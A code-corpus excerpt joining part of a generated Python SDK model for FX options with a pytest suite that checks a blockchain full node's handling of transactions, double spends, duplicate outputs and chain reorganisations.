if self.local_vars_configuration.client_side_validation and start_date is None: # noqa: E501
raise ValueError("Invalid value for `start_date`, must not be `None`") # noqa: E501
self._start_date = start_date
@property
def dom_ccy(self):
"""Gets the dom_ccy of this FxOption. # noqa: E501
The domestic currency of the instrument. # noqa: E501
:return: The dom_ccy of this FxOption. # noqa: E501
:rtype: str
"""
return self._dom_ccy
@dom_ccy.setter
def dom_ccy(self, dom_ccy):
"""Sets the dom_ccy of this FxOption.
The domestic currency of the instrument. # noqa: E501
:param dom_ccy: The dom_ccy of this FxOption. # noqa: E501
:type dom_ccy: str
"""
if self.local_vars_configuration.client_side_validation and dom_ccy is None: # noqa: E501
raise ValueError("Invalid value for `dom_ccy`, must not be `None`") # noqa: E501
self._dom_ccy = dom_ccy
@property
def dom_amount(self):
"""Gets the dom_amount of this FxOption. # noqa: E501
The Amount of DomCcy that will be exchanged if the option is exercised. This amount should be a positive number, with the Call/Put flag used to indicate direction. The corresponding amount of FgnCcy that will be exchanged is this amount times the strike. Note there is no rounding performed on this computed value. This is an optional field, if not set the option ContractSize will default to 1. # noqa: E501
:return: The dom_amount of this FxOption. # noqa: E501
:rtype: float
"""
return self._dom_amount
@dom_amount.setter
def dom_amount(self, dom_amount):
"""Sets the dom_amount of this FxOption.
The Amount of DomCcy that will be exchanged if the option is exercised. This amount should be a positive number, with the Call/Put flag used to indicate direction. The corresponding amount of FgnCcy that will be exchanged is this amount times the strike. Note there is no rounding performed on this computed value. This is an optional field, if not set the option ContractSize will default to 1. # noqa: E501
:param dom_amount: The dom_amount of this FxOption. # noqa: E501
:type dom_amount: float
"""
self._dom_amount = dom_amount
@property
def fgn_ccy(self):
"""Gets the fgn_ccy of this FxOption. # noqa: E501
The foreign currency of the FX. # noqa: E501
:return: The fgn_ccy of this FxOption. # noqa: E501
:rtype: str
"""
return self._fgn_ccy
@fgn_ccy.setter
def fgn_ccy(self, fgn_ccy):
"""Sets the fgn_ccy of this FxOption.
The foreign currency of the FX. # noqa: E501
:param fgn_ccy: The fgn_ccy of this FxOption. # noqa: E501
:type fgn_ccy: str
"""
if self.local_vars_configuration.client_side_validation and fgn_ccy is None: # noqa: E501
raise ValueError("Invalid value for `fgn_ccy`, must not be `None`") # noqa: E501
self._fgn_ccy = fgn_ccy
@property
def fgn_amount(self):
"""Gets the fgn_amount of this FxOption. # noqa: E501
For a vanilla FxOption contract, FgnAmount cannot be set. In case of a digital FxOption (IsPayoffDigital==true) a payoff (if the option is in the money) can be either in domestic or in foreign currency - for the latter FgnAmount must be set. Note: It is invalid to have FgnAmount and DomAmount at the same time. # noqa: E501
:return: The fgn_amount of this FxOption. # noqa: E501
:rtype: float
"""
return self._fgn_amount
@fgn_amount.setter
def fgn_amount(self, fgn_amount):
"""Sets the fgn_amount of this FxOption.
For a vanilla FxOption contract, FgnAmount cannot be set. In case of a digital FxOption (IsPayoffDigital==true) a payoff (if the option is in the money) can be either in domestic or in foreign currency - for the latter FgnAmount must be set. Note: It is invalid to have FgnAmount and DomAmount at the same time. # noqa: E501
:param fgn_amount: The fgn_amount of this FxOption. # noqa: E501
:type fgn_amount: float
"""
self._fgn_amount = fgn_amount
@property
def strike(self):
"""Gets the strike of this FxOption. # noqa: E501
The strike of the option. # noqa: E501
:return: The strike of this FxOption. # noqa: E501
:rtype: float
"""
return self._strike
@strike.setter
def strike(self, strike):
"""Sets the strike of this FxOption.
The strike of the option. # noqa: E501
:param strike: The strike of this FxOption. # noqa: E501
:type strike: float
"""
self._strike = strike
@property
def barriers(self):
"""Gets the barriers of this FxOption. # noqa: E501
For a barrier option the list should not be empty. Up to two barriers are supported. An option cannot be at the same time barrier- and touch-option. One (or both) of the lists must be empty. # noqa: E501
:return: The barriers of this FxOption. # noqa: E501
:rtype: list[lusid.Barrier]
"""
return self._barriers
@barriers.setter
def barriers(self, barriers):
"""Sets the barriers of this FxOption.
For a barrier option the list should not be empty. Up to two barriers are supported. An option cannot be at the same time barrier- and touch-option. One (or both) of the lists must be empty. # noqa: E501
:param barriers: The barriers of this FxOption. # noqa: E501
:type barriers: list[lusid.Barrier]
"""
self._barriers = barriers
@property
def exercise_type(self):
"""Gets the exercise_type of this FxOption. # noqa: E501
Type of optionality that is present; European, American. Supported string (enumeration) values are: [European, American]. # noqa: E501
:return: The exercise_type of this FxOption. # noqa: E501
:rtype: str
"""
return self._exercise_type
@exercise_type.setter
def exercise_type(self, exercise_type):
"""Sets the exercise_type of this FxOption.
Type of optionality that is present; European, American. Supported string (enumeration) values are: [European, American]. # noqa: E501
:param exercise_type: The exercise_type of this FxOption. # noqa: E501
:type exercise_type: str
"""
self._exercise_type = exercise_type
@property
def is_call_not_put(self):
"""Gets the is_call_not_put of this FxOption. # noqa: E501
True if the option is a call, false if the option is a put. # noqa: E501
:return: The is_call_not_put of this FxOption. # noqa: E501
:rtype: bool
"""
return self._is_call_not_put
@is_call_not_put.setter
def is_call_not_put(self, is_call_not_put):
"""Sets the is_call_not_put of this FxOption.
True if the option is a call, false if the option is a put. # noqa: E501
:param is_call_not_put: The is_call_not_put of this FxOption. # noqa: E501
:type is_call_not_put: bool
"""
if self.local_vars_configuration.client_side_validation and is_call_not_put is None: # noqa: E501
raise ValueError("Invalid value for `is_call_not_put`, must not be `None`") # noqa: E501
self._is_call_not_put = is_call_not_put
@property
def is_delivery_not_cash(self):
"""Gets the is_delivery_not_cash of this FxOption. # noqa: E501
True if the option delivers the FX underlying, False if the option is settled in cash. # noqa: E501
:return: The is_delivery_not_cash of this FxOption. # noqa: E501
:rtype: bool
"""
return self._is_delivery_not_cash
@is_delivery_not_cash.setter
def is_delivery_not_cash(self, is_delivery_not_cash):
"""Sets the is_delivery_not_cash of this FxOption.
True if the option delivers the FX underlying, False if the option is settled in cash. # noqa: E501
:param is_delivery_not_cash: The is_delivery_not_cash of this FxOption. # noqa: E501
:type is_delivery_not_cash: bool
"""
if self.local_vars_configuration.client_side_validation and is_delivery_not_cash is None: # noqa: E501
raise ValueError("Invalid value for `is_delivery_not_cash`, must not be `None`") # noqa: E501
self._is_delivery_not_cash = is_delivery_not_cash
@property
def is_payoff_digital(self):
"""Gets the is_payoff_digital of this FxOption. # noqa: E501
By default IsPayoffDigital is false. If IsPayoffDigital=true, the option is 'digital', and the option payoff is 0 or 1 unit of currency, instead of a vanilla CallPayoff=max(spot-strike,0) or PutPayoff=max(strike-spot,0). # noqa: E501
:return: The is_payoff_digital of this FxOption. # noqa: E501
:rtype: bool
"""
return self._is_payoff_digital
@is_payoff_digital.setter
def is_payoff_digital(self, is_payoff_digital):
"""Sets the is_payoff_digital of this FxOption.
By default IsPayoffDigital is false. If IsPayoffDigital=true, the option is 'digital', and the option payoff is 0 or 1 unit of currency, instead of a vanilla CallPayoff=max(spot-strike,0) or PutPayoff=max(strike-spot,0). # noqa: E501
:param is_payoff_digital: The is_payoff_digital of this FxOption. # noqa: E501
:type is_payoff_digital: bool
"""
self._is_payoff_digital = is_payoff_digital
@property
def option_maturity_date(self):
"""Gets the option_maturity_date of this FxOption. # noqa: E501
The maturity date of the option. # noqa: E501
:return: The option_maturity_date of this FxOption. # noqa: E501
:rtype: datetime
"""
return self._option_maturity_date
@option_maturity_date.setter
def option_maturity_date(self, option_maturity_date):
"""Sets the option_maturity_date of this FxOption.
The maturity date of the option. # noqa: E501
:param option_maturity_date: The option_maturity_date of this FxOption. # noqa: E501
:type option_maturity_date: datetime
"""
if self.local_vars_configuration.client_side_validation and option_maturity_date is None: # noqa: E501
raise ValueError("Invalid value for `option_maturity_date`, must not be `None`") # noqa: E501
self._option_maturity_date = option_maturity_date
@property
def option_settlement_date(self):
"""Gets the option_settlement_date of this FxOption. # noqa: E501
The settlement date of the option. # noqa: E501
:return: The option_settlement_date of this FxOption. # noqa: E501
:rtype: datetime
"""
return self._option_settlement_date
@option_settlement_date.setter
def option_settlement_date(self, option_settlement_date):
"""Sets the option_settlement_date of this FxOption.
The settlement date of the option. # noqa: E501
:param option_settlement_date: The option_settlement_date of this FxOption. # noqa: E501
:type option_settlement_date: datetime
"""
if self.local_vars_configuration.client_side_validation and option_settlement_date is None: # noqa: E501
raise ValueError("Invalid value for `option_settlement_date`, must not be `None`") # noqa: E501
self._option_settlement_date = option_settlement_date
@property
def payout_style(self):
"""Gets the payout_style of this FxOption. # noqa: E501
PayoutStyle for touch options. For options without touch optionality, payoutStyle should not be set. For options with touch optionality (where the touches data has been set), payoutStyle must be defined and cannot be None. Supported string (enumeration) values are: [Deferred, Immediate]. # noqa: E501
:return: The payout_style of this FxOption. # noqa: E501
:rtype: str
"""
return self._payout_style
@payout_style.setter
def payout_style(self, payout_style):
"""Sets the payout_style of this FxOption.
PayoutStyle for touch options. For options without touch optionality, payoutStyle should not be set. For options with touch optionality (where the touches data has been set), payoutStyle must be defined and cannot be None. Supported string (enumeration) values are: [Deferred, Immediate]. # noqa: E501
:param payout_style: The payout_style of this FxOption. # noqa: E501
:type payout_style: str
"""
self._payout_style = payout_style
@property
def premium(self):
"""Gets the premium of this FxOption. # noqa: E501
:return: The premium of this FxOption. # noqa: E501
:rtype: lusid.Premium
"""
return self._premium
@premium.setter
def premium(self, premium):
"""Sets the premium of this FxOption.
:param premium: The premium of this FxOption. # noqa: E501
:type premium: lusid.Premium
"""
self._premium = premium
@property
def touches(self):
"""Gets the touches of this FxOption. # noqa: E501
For a touch option the list should not be empty. Up to two touches are supported. An option cannot be at the same time barrier- and touch-option. One (or both) of the lists must be empty. # noqa: E501
:return: The touches of this FxOption. # noqa: E501
:rtype: list[lusid.Touch]
"""
return self._touches
@touches.setter
def touches(self, touches):
"""Sets the touches of this FxOption.
For a touch option the list should not be empty. Up to two touches are supported. An option cannot be at the same time barrier- and touch-option. One (or both) of the lists must be empty. # noqa: E501
:param touches: The touches of this FxOption. # noqa: E501
:type touches: list[lusid.Touch]
"""
self._touches = touches
@property
def instrument_type(self):
"""Gets the instrument_type of this FxOption. # noqa: E501
The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CapFloor, CashSettled, CdsIndex, Basket, FundingLeg, FxSwap, ForwardRateAgreement, SimpleInstrument, Repo, Equity, ExchangeTradedOption, ReferenceInstrument, ComplexBond, InflationLinkedBond, InflationSwap, SimpleCashFlowLoan # noqa: E501
:return: The instrument_type of this FxOption. # noqa: E501
:rtype: str
"""
return self._instrument_type
@instrument_type.setter
def instrument_type(self, instrument_type):
"""Sets the instrument_type of this FxOption.
The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CapFloor, CashSettled, CdsIndex, Basket, FundingLeg, FxSwap, ForwardRateAgreement, SimpleInstrument, Repo, Equity, ExchangeTradedOption, ReferenceInstrument, ComplexBond, InflationLinkedBond, InflationSwap, SimpleCashFlowLoan # noqa: E501
:param instrument_type: The instrument_type of this FxOption. # noqa: E501
:type instrument_type: str
"""
if self.local_vars_configuration.client_side_validation and instrument_type is None: # noqa: E501
raise ValueError("Invalid value for `instrument_type`, must not be `None`") # noqa: E501
allowed_values = ["QuotedSecurity", "InterestRateSwap", "FxForward", "Future", "ExoticInstrument", "FxOption", "CreditDefaultSwap", "InterestRateSwaption", "Bond", "EquityOption", "FixedLeg", "FloatingLeg", "BespokeCashFlowsLeg", "Unknown", "TermDeposit", "ContractForDifference", "EquitySwap", "CashPerpetual", "CapFloor", "CashSettled", "CdsIndex", "Basket", "FundingLeg", "FxSwap", "ForwardRateAgreement", "SimpleInstrument", "Repo", "Equity", "ExchangeTradedOption", "ReferenceInstrument", "ComplexBond", "InflationLinkedBond", "InflationSwap", "SimpleCashFlowLoan"] # noqa: E501
if self.local_vars_configuration.client_side_validation and instrument_type not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `instrument_type` ({0}), must be one of {1}" # noqa: E501
.format(instrument_type, allowed_values)
)
self._instrument_type = instrument_type
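    # Illustrative note (added for clarity; not part of the generated SDK code):
    # with client-side validation enabled, the setter above rejects values
    # outside `allowed_values` immediately, e.g. (assuming `opt` is an FxOption):
    #
    #     opt.instrument_type = "FxOption"        # accepted
    #     opt.instrument_type = "NotARealType"    # raises ValueError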
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
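    # Illustrative note (the exact key names in `attribute_map` are an assumption
    # based on typical OpenAPI-generated SDKs): to_dict(serialize=True) renames
    # keys to their wire format, so an attribute such as `is_payoff_digital`
    # would appear under a camelCase key like `isPayoffDigital`, while plain
    # to_dict() keeps the snake_case attribute names.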
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, FxOption):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, FxOption):
return True
return self.to_dict() != other.to_dict()
| [
"[email protected]"
] | |
612a1943b2e44d5c298c6f1cc9756958d649bcfc | 3fa6edd22b4c826431d2b55d1aced446bf2755ac | /tests/blockchain/test_blockchain_transactions.py | 24838b3476029cfdc5243ac3ac25c6cbd7291240 | [
"Apache-2.0"
] | permissive | luzofex/plottingid-blockchain-1 | f3bca87316e93466b7512039f2c588a9baadd4a7 | d8a6bdfeb4474b4075e89c129853a606f55dd778 | refs/heads/main | 2023-06-11T12:32:36.690472 | 2021-07-06T19:23:19 | 2021-07-06T19:23:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40,394 | py | import asyncio
import logging
import pytest
from clvm.casts import int_to_bytes
from plottingid.consensus.blockchain import ReceiveBlockResult
from plottingid.protocols import full_node_protocol
from plottingid.types.announcement import Announcement
from plottingid.types.condition_opcodes import ConditionOpcode
from plottingid.types.condition_with_args import ConditionWithArgs
from plottingid.types.spend_bundle import SpendBundle
from plottingid.util.errors import ConsensusError, Err
from plottingid.util.ints import uint64
from plottingid.util.wallet_tools import WalletTool
from tests.core.full_node.test_full_node import connect_and_get_peer
from tests.setup_nodes import bt, setup_two_nodes, test_constants
from tests.util.generator_tools_testing import run_and_get_removals_and_additions
BURN_PUZZLE_HASH = b"0" * 32
WALLET_A = WalletTool(test_constants)
WALLET_A_PUZZLE_HASHES = [WALLET_A.get_new_puzzlehash() for _ in range(5)]
log = logging.getLogger(__name__)
@pytest.fixture(scope="session")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
class TestBlockchainTransactions:
@pytest.fixture(scope="function")
async def two_nodes(self):
async for _ in setup_two_nodes(test_constants):
yield _
@pytest.mark.asyncio
async def test_basic_blockchain_tx(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
peer = await connect_and_get_peer(server_1, server_2)
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block), None)
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
assert spend_bundle is not None
tx: full_node_protocol.RespondTransaction = full_node_protocol.RespondTransaction(spend_bundle)
await full_node_api_1.respond_transaction(tx, peer)
sb = full_node_1.mempool_manager.get_spendbundle(spend_bundle.name())
assert sb is spend_bundle
last_block = blocks[-1]
next_spendbundle, additions, removals = await full_node_1.mempool_manager.create_bundle_from_mempool(
last_block.header_hash
)
assert next_spendbundle is not None
new_blocks = bt.get_consecutive_blocks(
1,
block_list_input=blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=next_spendbundle,
guarantee_transaction_block=True,
)
next_block = new_blocks[-1]
await full_node_1.respond_block(full_node_protocol.RespondBlock(next_block))
assert next_block.header_hash == full_node_1.blockchain.get_peak().header_hash
added_coins = next_spendbundle.additions()
# Two coins are added, main spend and change
assert len(added_coins) == 2
for coin in added_coins:
unspent = await full_node_1.coin_store.get_coin_record(coin.name())
assert unspent is not None
assert not unspent.spent
assert not unspent.coinbase
@pytest.mark.asyncio
async def test_validate_blockchain_with_double_spend(self, two_nodes):
num_blocks = 5
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_3, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
spend_bundle_double = wallet_a.generate_signed_transaction(1001, receiver_puzzlehash, spend_coin)
block_spendbundle = SpendBundle.aggregate([spend_bundle, spend_bundle_double])
new_blocks = bt.get_consecutive_blocks(
1,
block_list_input=blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block_spendbundle,
guarantee_transaction_block=True,
)
next_block = new_blocks[-1]
res, err, _ = await full_node_1.blockchain.receive_block(next_block)
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.DOUBLE_SPEND
@pytest.mark.asyncio
async def test_validate_blockchain_duplicate_output(self, two_nodes):
num_blocks = 3
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
spend_bundle_double = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
block_spendbundle = SpendBundle.aggregate([spend_bundle, spend_bundle_double])
new_blocks = bt.get_consecutive_blocks(
1,
block_list_input=blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block_spendbundle,
guarantee_transaction_block=True,
)
next_block = new_blocks[-1]
res, err, _ = await full_node_1.blockchain.receive_block(next_block)
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.DUPLICATE_OUTPUT
@pytest.mark.asyncio
async def test_validate_blockchain_with_reorg_double_spend(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
blocks_spend = bt.get_consecutive_blocks(
1,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
)
# Move chain to height 10, with a spend at height 10
for block in blocks_spend:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Reorg at height 5, add up to and including height 12
new_blocks = bt.get_consecutive_blocks(
7,
blocks[:6],
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
seed=b"another seed",
)
for block in new_blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Spend the same coin in the new reorg chain at height 13
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
)
res, err, _ = await full_node_api_1.full_node.blockchain.receive_block(new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
# But can't spend it twice
new_blocks_double = bt.get_consecutive_blocks(
1,
new_blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
)
res, err, _ = await full_node_api_1.full_node.blockchain.receive_block(new_blocks_double[-1])
assert err is Err.DOUBLE_SPEND
assert res == ReceiveBlockResult.INVALID_BLOCK
        # Now test a reorg at height 5, with the same spend at block height 12
new_blocks_reorg = bt.get_consecutive_blocks(
1,
new_blocks[:12],
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
seed=b"spend at 12 is ok",
)
for block in new_blocks_reorg:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Spend at height 13 is also OK (same height)
new_blocks_reorg = bt.get_consecutive_blocks(
1,
new_blocks[:13],
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
seed=b"spend at 13 is ok",
)
for block in new_blocks_reorg:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
        # Spend at height 14 is not OK (already spent)
new_blocks_reorg = bt.get_consecutive_blocks(
1,
new_blocks[:14],
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
seed=b"spend at 14 is double spend",
)
with pytest.raises(ConsensusError):
for block in new_blocks_reorg:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
@pytest.mark.asyncio
async def test_validate_blockchain_spend_reorg_coin(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_1_puzzlehash = WALLET_A_PUZZLE_HASHES[1]
receiver_2_puzzlehash = WALLET_A_PUZZLE_HASHES[2]
receiver_3_puzzlehash = WALLET_A_PUZZLE_HASHES[3]
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_1_puzzlehash, spend_coin)
new_blocks = bt.get_consecutive_blocks(
1,
blocks[:5],
seed=b"spend_reorg_coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
guarantee_transaction_block=True,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
coin_2 = None
for coin in run_and_get_removals_and_additions(new_blocks[-1], test_constants.MAX_BLOCK_COST_CLVM)[1]:
if coin.puzzle_hash == receiver_1_puzzlehash:
coin_2 = coin
break
assert coin_2 is not None
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_2_puzzlehash, coin_2)
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks[:6],
seed=b"spend_reorg_coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
guarantee_transaction_block=True,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
coin_3 = None
for coin in run_and_get_removals_and_additions(new_blocks[-1], test_constants.MAX_BLOCK_COST_CLVM)[1]:
if coin.puzzle_hash == receiver_2_puzzlehash:
coin_3 = coin
break
assert coin_3 is not None
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_3_puzzlehash, coin_3)
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks[:7],
seed=b"spend_reorg_coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
guarantee_transaction_block=True,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
@pytest.mark.asyncio
async def test_validate_blockchain_spend_reorg_cb_coin(self, two_nodes):
num_blocks = 15
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_1_puzzlehash = WALLET_A_PUZZLE_HASHES[1]
blocks = bt.get_consecutive_blocks(num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Spends a coinbase created in reorg
new_blocks = bt.get_consecutive_blocks(
5,
blocks[:6],
seed=b"reorg cb coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
for block in new_blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = new_blocks[-1]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_1_puzzlehash, spend_coin)
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
seed=b"reorg cb coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
guarantee_transaction_block=True,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
@pytest.mark.asyncio
async def test_validate_blockchain_spend_reorg_since_genesis(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_1_puzzlehash = WALLET_A_PUZZLE_HASHES[1]
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[-1]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_1_puzzlehash, spend_coin)
new_blocks = bt.get_consecutive_blocks(
1, blocks, seed=b"", farmer_reward_puzzle_hash=coinbase_puzzlehash, transaction_data=spend_bundle
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
        # Spends a coin in a genesis reorg that was already spent
new_blocks = bt.get_consecutive_blocks(
12,
[],
seed=b"reorg since genesis",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
for block in new_blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
seed=b"reorg since genesis",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
@pytest.mark.asyncio
async def test_assert_my_coin_id(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
spend_block = blocks[2]
bad_block = blocks[3]
spend_coin = None
bad_spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
for coin in list(bad_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
bad_spend_coin = coin
valid_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_MY_COIN_ID, [spend_coin.name()])
valid_dic = {valid_cvp.opcode: [valid_cvp]}
bad_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_MY_COIN_ID, [bad_spend_coin.name()])
bad_dic = {bad_cvp.opcode: [bad_cvp]}
